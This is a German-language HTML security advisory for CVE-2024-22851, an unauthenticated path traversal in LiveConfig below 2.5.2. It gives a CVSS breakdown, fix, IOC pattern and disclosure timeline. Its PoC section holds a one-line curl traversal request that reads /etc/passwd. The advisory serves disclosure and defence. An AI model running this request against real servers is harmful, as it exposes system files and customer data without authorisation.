<!DOCTYPE html>
<html lang="de">
<head>
  <meta charset="UTF-8">
  <title>Advisory: LiveConfig Unauthenticated Path Traversal</title>
  <style>
    body {
      font-family: sans-serif;
      line-height: 1.6;
      max-width: 900px;
      margin: 2rem auto;
      padding: 1rem;
      background-color: #3d3a39;
      color: white;
    }
    h1, h2, h3, h4 {
      color: white;
    }
    pre {
      background: #3d3a39;
      padding: 1em;
      overflow-x: auto;
    }
    blockquote {
      border-left: 4px solid #ccc;
      margin: 1em 0;
      padding: 0.5em 1em;
      background: #f2f2f2;
    }
    a {
      color: white;
    }
    #toc_container {
        background: #686564 none repeat scroll 0 0;
        border: 1px solid #aaa;
        display: table;
        font-size: 95%;
        margin-bottom: 1em;
        padding: 20px;
        width: auto;
    }

    .toc_title {
        font-weight: 700;
        text-align: center;
    }

    #toc_container li, #toc_container ul, #toc_container ul li{
        list-style: outside none none !important;
    }
  </style>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/atom-one-dark.min.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/languages/http.min.js"></script>
  <script>
    document.addEventListener("DOMContentLoaded", function() {
      hljs.highlightAll();
    });
  </script>   
</head>
<body>

<h1>LiveConfig Advisory (CVE-2024-22851)</h1>

<p><strong>Disclaimer:</strong> Dieser Blogpost wurde ursprünglich im DriveByte Blog veröffentlicht. Da die Firma allerdings liquidiert wird, habe ich beschlossen meine alten Blogposts umzuziehen, damit sie nicht verloren gehen.</p>

<h2>Table of Contents</h2>
<div id="toc_container">
    <p class="toc_title">Inhaltsverzeichnis</p>
    <ul class="toc_list">
        <li><a href="#Intro">1 Einführung</a></li>
        <li><a href="#affected">2 Betroffene Produkte</a></li>
        <li><a href="#PoC">3 PoC</a></li>
        <li><a href="#risk">4 Risiko-Einschätzung</a></li>
        <li><a href="#CVE">5 CVE ID</a></li>
        <li><a href="#solution">6 Lösung/Behebung</a></li>
        <li><a href="#IOCs">7 IOCs</a></li>
        <li><a href="#Thanks">8 Danksagung</a></li>
        <li><a href="#Timeline">9 Timeline</a></li>
    </ul>
</div>

<h2 id="Intro">Beschreibung</h2>

<p>"LiveConfig ist die schnellste und schlankeste Controlpanel-Software auf dem Markt. Es vereinfacht die Serverkonfiguration und sorgt für einen zuverlässigen und sicheren Serverbetrieb."<a href="https://www.liveconfig.com/de/">1</a>. </p>

<p>Die LiveConfig® Software ist verwundbar für ein sogenanntes "Unauthentifiziertes Path Traversal" in Versionen &lt; 2.5.2. Der verwundbare Endpoint ist dabei <code>static</code>.
Aktuellere Versionen von LiveConfig® sind <strong>nicht</strong> verwundbar.
Die Schwachstelle erlaubt es einem Angreifer, Systemdateien mit den Berechtigungen des benutzers <code>liveconfig</code> zu lesen. Das beinhaltet auch Kundendaten aus der LiveConfig® Datenbank selbst.</p>

<h2 id="affected">Betroffene Produkte</h2>

<p>LiveConfig® &lt; 2.5.2</p>

<h2 id="PoC">PoC</h2>

<pre><code class="language-bash">
curl -s -k -X $'GET' --path-as-is 'https://test.machine:8443/static///////../../../../etc/passwd'
</code></pre>

<h2 id="risk">Risiko Einschätzung</h2>

<p>Es wurde ein CVSS 4.0 score von 8.7 <a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N</a> errechnet, der zum besseren Verständnis hier aufgeschlüsselt ist:</p>

<h3>Exploitability Metrics</h3>

<p><strong>Attack Vector (AV):</strong> Network (N)<br />
<strong>Attack Complexity (AC):</strong> Low (L)<br />
<strong>Attack Requirements (AT):</strong> None (N)<br />
<strong>Privileges Required (PR):</strong> None (N)<br />
<strong>User Interaction (UI):</strong> None (N)   </p>

<h3>Vulnerable System Impact Metrics</h3>

<p><strong>Confidentiality (VC):</strong> High (H)<br />
<strong>Integrity (VI):</strong> None (N)<br />
<strong>Availability (VA):</strong> None (N)   </p>

<h3>Subsequent System Impact Metrics</h3>

<p><strong>Confidentiality (SC):</strong> Low (L)<br />
<strong>Integrity (SI):</strong> None (N)<br />
<strong>Availability (SA):</strong> None (N)   </p>

<h2 id="CVE">CVE ID</h2>

<p>CVE-2024-22851</p>

<h2 id="solution">Lösung/Behebung</h2>

<p>Die Schwachstelle hat keinen hotfix. Die Schwachstelle ist allerdings ab Version 2.5.2 behoben. Die Komponente <code>static</code> wurde in dieser Version entfernt. Die DriveByte GmbH empfiehlt trotzdem ein upgrade auf die <strong>aktuellste</strong> Version von LiveConfig®.</p>

<h2 id="IOCs">IOCs</h2>

<p>Aufrufe auf den Endpunkt <code>/static///////../../../../</code> können überprüft werden um eine potenzielle Ausnutzung der Schwachstelle zu erkennen.</p>

<h2 id="thanks">Danksagung</h2>

<p>Ein herzliches Dankeschön geht an das LiveConfig-Team für die hervorragende, schnelle und freundliche Zusammenarbeit.</p>

<h2 id="Timeline">Disclosure Timeline</h2>

<p>06.11.2023 - Hersteller Informiert<br />
06.11.2023 - Der Hersteller hat die Informationen überprüft und die Schwachstelle sowie deren unbewusste behebung in Commit 584a11418 vom 28.11.2017<br />
09.01.2024 - Beantragung einer CVE<br />
29.01.2024 - Bestätigung der Reservierung einer CVE durch MITRE<br />
31.01.2024 - Veröffentlichung des Advisory
</p>
</body>
</html>